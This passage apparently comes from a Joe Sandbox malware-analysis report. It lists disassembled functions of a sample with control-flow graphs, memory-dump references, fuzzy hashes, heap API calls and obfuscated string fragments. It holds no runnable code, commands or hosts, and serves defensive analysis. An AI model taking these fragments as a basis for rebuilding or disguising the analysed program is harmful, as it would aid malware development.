                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: @
                                                                                                                                                            • API String ID: 0-2766056989
                                                                                                                                                            • Opcode ID: 128d52a88ef26d4d08faf7e63341295aefedbd63f7df747b3eee3c950d18c52e
                                                                                                                                                            • Instruction ID: 6e937cdd51005cef77aba83a4e2468a4a4cd93feb4ae1ad6d16098bcd100b2c3
                                                                                                                                                            • Opcode Fuzzy Hash: 128d52a88ef26d4d08faf7e63341295aefedbd63f7df747b3eee3c950d18c52e
                                                                                                                                                            • Instruction Fuzzy Hash: 263188B15183019FD718DF14C8A072AF7F1EF95344F48985EE5C69B3A1E7389904CB56
                                                                                                                                                            Function 00BA049B Relevance: .3, Instructions: 264COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 261 ba049b-ba0515 call b9c9f0 265 ba045b-ba0469 call bd5700 261->265 266 ba03fb-ba0414 261->266 267 ba0339-ba034f 261->267 268 ba03be 261->268 269 ba03de-ba03e3 261->269 270 ba035f-ba0367 261->270 271 ba051c-ba051e 261->271 272 ba0472-ba0477 261->272 273 ba0393-ba0397 261->273 274 ba0370-ba037e 261->274 275 ba03d0-ba03d7 261->275 276 ba0311-ba0332 261->276 277 ba0356 261->277 278 ba0417-ba0430 261->278 279 ba0308-ba030c 261->279 280 ba03ec-ba03f4 261->280 281 ba0242-ba0244 261->281 282 ba0482-ba0484 261->282 283 ba0440-ba0458 call bd5700 261->283 284 ba0480 261->284 285 ba0246-ba0260 261->285 286 ba0386-ba038c 261->286 287 ba0227-ba023b 261->287 265->272 266->278 267->265 267->266 267->268 267->269 267->270 267->272 267->273 267->274 267->275 267->277 267->278 267->280 267->282 267->283 267->284 267->286 268->275 269->280 270->274 291 ba0520 271->291 272->284 295 ba03a0-ba03b7 273->295 274->286 275->266 275->269 275->272 275->273 275->278 275->280 275->282 275->284 275->286 276->265 276->266 276->267 276->268 276->269 276->270 276->272 276->273 276->274 276->275 276->277 276->278 276->280 276->282 276->283 276->284 276->286 277->270 278->283 293 ba048d-ba0496 279->293 280->266 280->272 280->273 280->282 280->284 288 ba0296-ba02bd 281->288 282->293 283->265 289 ba0262 285->289 290 ba0294 285->290 286->272 286->273 286->282 286->284 287->265 287->266 287->267 287->268 287->269 287->270 287->272 287->273 287->274 287->275 287->276 287->277 287->278 287->279 287->280 287->281 287->282 287->283 287->284 287->285 287->286 297 ba02ea-ba0301 288->297 298 ba02bf 288->298 296 ba0270-ba0292 call ba2eb0 289->296 290->288 306 ba0529-ba0b30 291->306 293->291 295->265 295->266 295->268 295->269 295->272 295->273 295->275 295->278 295->280 295->282 295->283 295->284 295->286 296->290 297->265 297->266 297->267 297->268 297->269 297->270 297->272 297->273 297->274 297->275 297->276 297->277 297->278 297->279 297->280 297->282 297->283 297->284 297->286 308 ba02c0-ba02e8 call ba2e70 298->308 308->297
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: aa2fa2cb385b118f3936e9ff59abfd283ca670149b8ca21d4dc3cbcb1c2f72e4
                                                                                                                                                            • Instruction ID: cd43bf98cce314cc3ecc129f589ab16f3f9823a058c9b7238e5c5311406dff00
                                                                                                                                                            • Opcode Fuzzy Hash: aa2fa2cb385b118f3936e9ff59abfd283ca670149b8ca21d4dc3cbcb1c2f72e4
                                                                                                                                                            • Instruction Fuzzy Hash: 13918C75205B01CFD724CF25E894A27B7F6FF89310F158A6DE8568BAA1EB30E815CB50
                                                                                                                                                            Function 00BA0228 Relevance: .2, Instructions: 218COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 315 ba0228-ba023b 316 ba045b-ba0469 call bd5700 315->316 317 ba03fb-ba0414 315->317 318 ba0339-ba034f 315->318 319 ba03be 315->319 320 ba03de-ba03e3 315->320 321 ba035f-ba0367 315->321 322 ba0472-ba0477 315->322 323 ba0393-ba0397 315->323 324 ba0370-ba037e 315->324 325 ba03d0-ba03d7 315->325 326 ba0311-ba0332 315->326 327 ba0356 315->327 328 ba0417-ba0430 315->328 329 ba0308-ba030c 315->329 330 ba03ec-ba03f4 315->330 331 ba0242-ba0244 315->331 332 ba0482-ba0484 315->332 333 ba0440-ba0458 call bd5700 315->333 334 ba0480 315->334 335 ba0246-ba0260 315->335 336 ba0386-ba038c 315->336 316->322 317->328 318->316 318->317 318->319 318->320 318->321 318->322 318->323 318->324 318->325 318->327 318->328 318->330 318->332 318->333 318->334 318->336 319->325 320->330 321->324 322->334 343 ba03a0-ba03b7 323->343 324->336 325->317 325->320 325->322 325->323 325->328 325->330 325->332 325->334 325->336 326->316 326->317 326->318 326->319 326->320 326->321 326->322 326->323 326->324 326->325 326->327 326->328 326->330 326->332 326->333 326->334 326->336 327->321 328->333 341 ba048d-ba0496 329->341 330->317 330->322 330->323 330->332 330->334 337 ba0296-ba02bd 331->337 332->341 333->316 338 ba0262 335->338 339 ba0294 335->339 336->322 336->323 336->332 336->334 345 ba02ea-ba0301 337->345 346 ba02bf 337->346 344 ba0270-ba0292 call ba2eb0 338->344 339->337 356 ba0520 341->356 343->316 343->317 343->319 343->320 343->322 343->323 343->325 343->328 343->330 343->332 343->333 343->334 343->336 344->339 345->316 345->317 345->318 345->319 345->320 345->321 345->322 345->323 345->324 345->325 345->326 345->327 345->328 345->329 345->330 345->332 345->333 345->334 345->336 355 ba02c0-ba02e8 call ba2e70 346->355 355->345 361 ba0529-ba0b30 356->361
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: bacc08c60371a6e5944a0cf8cf0119ec7dbf7446f936b42426eb7b361fe1bb28
                                                                                                                                                            • Instruction ID: c09fe323faf700f1ca25199b3718ffe94a386f072e2ea43486a9c51b49b68615
                                                                                                                                                            • Opcode Fuzzy Hash: bacc08c60371a6e5944a0cf8cf0119ec7dbf7446f936b42426eb7b361fe1bb28
                                                                                                                                                            • Instruction Fuzzy Hash: E3718C74209701DFD7248F20EC94B26B7F6FF4A310F1089ADE8468BA62DB31E815CB50
                                                                                                                                                            Function 00BD99D0 Relevance: .1, Instructions: 143COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: b62ede25f0451f0f1d03d04d9e8bbf6f451330be779608a0a2c1d5365fb782e8
                                                                                                                                                            • Instruction ID: b61e95f7d4d5e7814feaedbb864a54ce95a9c3578c8431f81059567dab53d1c8
                                                                                                                                                            • Opcode Fuzzy Hash: b62ede25f0451f0f1d03d04d9e8bbf6f451330be779608a0a2c1d5365fb782e8
                                                                                                                                                            • Instruction Fuzzy Hash: AE419F35208340ABD7249E15D990B2BF7E5EB85714F1588AEE5C99B351E331EC11CB62
                                                                                                                                                            Function 00BD63B8 Relevance: .1, Instructions: 99COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: 5788ce1dbff18b7d53d1298e805162726ef434957c80de1dcc2c7d97cd963489
                                                                                                                                                            • Instruction ID: 8f99731e95ce221d194131581d525b55e831d5a079a21e308a8ad7bc2e2ccd87
                                                                                                                                                            • Opcode Fuzzy Hash: 5788ce1dbff18b7d53d1298e805162726ef434957c80de1dcc2c7d97cd963489
                                                                                                                                                            • Instruction Fuzzy Hash: 6631F274249301BAD624DB08CD82F3AF7E1EB80B25F64854DF1C15B3E1E770AC118B56
                                                                                                                                                            Function 00BA0EEC Relevance: .1, Instructions: 72COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 7bcab804f89f8f19067f5ffcbec3abbf2e1d054f0c7ac774d19c0f0a5f4d3a60
                                                                                                                                                            • Instruction ID: 0eb71572923485b61ab29f390559ea5ccf07c3b42a358c5c12434d29ddba4d4e
                                                                                                                                                            • Opcode Fuzzy Hash: 7bcab804f89f8f19067f5ffcbec3abbf2e1d054f0c7ac774d19c0f0a5f4d3a60
                                                                                                                                                            • Instruction Fuzzy Hash: 86213AB4A0425A9FDB15CF94CC90BBEBBB1FF4A304F144859E911BB392C735A901CB64
                                                                                                                                                            Function 00BD3220 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 202 bd3220-bd322f 203 bd32ac-bd32b0 202->203 204 bd3236-bd3252 202->204 205 bd32a0 202->205 206 bd32a2-bd32a6 RtlFreeHeap 202->206 207 bd3254 204->207 208 bd3286-bd3296 204->208 205->206 206->203 209 bd3260-bd3284 call bd5af0 207->209 208->205 209->208
                                                                                                                                                            APIs
                                                                                                                                                            • RtlFreeHeap.NTDLL(?,00000000), ref: 00BD32A6
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                            • Opcode ID: 412ac1cf11743f5aa549301c9f55d22089829c80daa3cc96a2030502a2d16248
                                                                                                                                                            • Instruction ID: e3993614c9f0f928df8ea407cc914c1b4bade5abc5a23c62e917b7b9fb89e3c7
                                                                                                                                                            • Opcode Fuzzy Hash: 412ac1cf11743f5aa549301c9f55d22089829c80daa3cc96a2030502a2d16248
                                                                                                                                                            • Instruction Fuzzy Hash: EB016D3490D2909BC701EF18E889A1AFBE8EF4AB00F05485CE5C58B361D735DD60CB96
                                                                                                                                                            Function 00BD3202 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 213 bd3202-bd3211 RtlAllocateHeap
                                                                                                                                                            APIs
                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,00000000), ref: 00BD3208
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                            • Opcode ID: f3d728dec9a284381affb13234c336ac69f2fb715332cb6313670390c4d17850
                                                                                                                                                            • Instruction ID: 803b0b7270710a28090d12d975eed0d9247b3ca7213297581810a0b6a7e43204
                                                                                                                                                            • Opcode Fuzzy Hash: f3d728dec9a284381affb13234c336ac69f2fb715332cb6313670390c4d17850
                                                                                                                                                            • Instruction Fuzzy Hash: 19B012301400005FDA041B00EC0AF043510EB00606F800050A1000D0B1D5B15C64C554

                                                                                                                                                            Non-executed Functions

                                                                                                                                                            Function 00BC23E0 Relevance: 33.0, APIs: 4, Strings: 13, Instructions: 3298COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %*+($3<$:$Cx$`tii$aenQ$f@~!$fedc$ggxz$mlc@${l`~$|}&C$#v
                                                                                                                                                            • API String ID: 0-2260822535
                                                                                                                                                            • Opcode ID: 6473596682501d3b3ca1a386b37a5c8565efbe8c20834428a0454053afcb8c9c
                                                                                                                                                            • Instruction ID: 030d8b322273e5a636eff3475f7ce7fe0d92b9ac0aad616dac967d2d97420a2c
                                                                                                                                                            • Opcode Fuzzy Hash: 6473596682501d3b3ca1a386b37a5c8565efbe8c20834428a0454053afcb8c9c
                                                                                                                                                            • Instruction Fuzzy Hash: 6C338A70504B818FD7258F38C590B62BBE1FF16704F58899DE4DA8BB92C735E906CBA1
                                                                                                                                                            Function 00BADB6F Relevance: 32.0, Strings: 24, Instructions: 2006COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID: %*+($()./$89&'$89>?$:WUE$<=2$<=:;$@ONM$AR$D$DCBA$LKJI$QNOL$T$WP$`Y^_$`onm$dcba$lkji$mjkh$tsrq$tuJK$xgfe$|
                                                                                                                                                            • API String ID: 2994545307-1418943773
                                                                                                                                                            • Opcode ID: 94b4e7e24389d16d8a9b64629585155b684e78a7ba4f62e1630000884988f1ab
                                                                                                                                                            • Instruction ID: 66f45603e2b95835f95e85ba56704df11ed9e2937db24cbb371909a1857c1446
                                                                                                                                                            • Opcode Fuzzy Hash: 94b4e7e24389d16d8a9b64629585155b684e78a7ba4f62e1630000884988f1ab
                                                                                                                                                            • Instruction Fuzzy Hash: A9F278B050C3829BD770CF14C494BABBBE2EFD6304F5448ADE4D98B251EB719984CB92
                                                                                                                                                            Function 00BB9F62 Relevance: 21.7, Strings: 17, Instructions: 473COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
